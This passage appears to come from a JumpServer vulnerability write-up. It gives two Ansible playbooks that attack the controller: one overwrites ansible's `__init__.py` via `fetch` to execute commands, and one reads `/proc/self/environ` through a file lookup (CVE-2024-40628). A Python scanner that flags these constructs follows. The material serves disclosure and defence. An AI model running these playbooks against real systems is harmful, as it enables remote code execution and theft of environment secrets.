```yaml
- hosts: all
  tasks:
    - name: create python file on remote host that executes a command
      shell: |
        echo 'from ansible.release import __version__, __author__
        __import__("os").system("id > /tmp/pwnd")' > /tmp/rce
    - name: write that file at a known location that gets reloaded at the next ansible execution
      fetch:
        src: /tmp/rce
        dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py
        flat: true
```
Run the job.
The command executes successfully.
CVE-2024-40628
Just replace the payload in the workspace with the following:
```yaml
- hosts: all
  tasks:
    - name: read file from local host = celery using file lookup plugin
      ansible.builtin.debug:
        msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"
```
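Both jobs above rely on playbook constructs that act on the Ansible controller (the celery worker) rather than on the managed host: `fetch` writes a file there, and lookup plugins read from it. The following is an added example, not code from the original post or from JumpServer: a heuristic pre-execution check that flags those constructs in a submitted playbook. The function name, rule labels and sample playbooks are constructed for illustration, and a line-based scan like this will not catch every indirect form (for example, module names supplied through variables).

```python
import re

# Modules/plugins that act on the Ansible controller rather than the managed host.
FETCH_RE = re.compile(r"^\s*(?:-\s+)?(?:ansible\.(?:builtin|legacy)\.)?fetch\s*:")
LOOKUP_RE = re.compile(r"\b(?:lookup|query|q)\s*\(\s*['\"]([\w.]+)['\"]")
WITH_RE = re.compile(r"^\s*with_(\w+)\s*:")  # legacy with_<lookup> loops
CONTROLLER_LOOKUPS = {"file", "fileglob", "lines", "pipe", "env", "template"}

def scan_playbook(text):
    """Return (line_number, rule) pairs for constructs that touch the controller."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # skip YAML comments
        if FETCH_RE.match(line):
            findings.append((number, "fetch"))
        plugins = [m.group(1) for m in LOOKUP_RE.finditer(line)]
        legacy = WITH_RE.match(line)
        if legacy:
            plugins.append(legacy.group(1))
        for plugin in plugins:
            short = plugin.rsplit(".", 1)[-1]  # ansible.builtin.file -> file
            if short in CONTROLLER_LOOKUPS:
                findings.append((number, "lookup:" + short))
    return findings

# Constructed samples with the same shape as the two jobs above.
WRITE_PLAYBOOK = """\
- hosts: all
  tasks:
    - name: stage a file on the managed host
      shell: echo test > /tmp/staged
    - name: copy it back to the controller
      fetch:
        src: /tmp/staged
        dest: /srv/example/collected.txt
        flat: true
"""
READ_PLAYBOOK = """\
- hosts: all
  tasks:
    - name: print a value
      ansible.builtin.debug:
        msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"
"""
BENIGN_PLAYBOOK = "- hosts: all\n  tasks:\n    - debug:\n        msg: hello\n"

if __name__ == "__main__":
    for name in ("WRITE_PLAYBOOK", "READ_PLAYBOOK", "BENIGN_PLAYBOOK"):
        print(name, scan_playbook(globals()[name]))
```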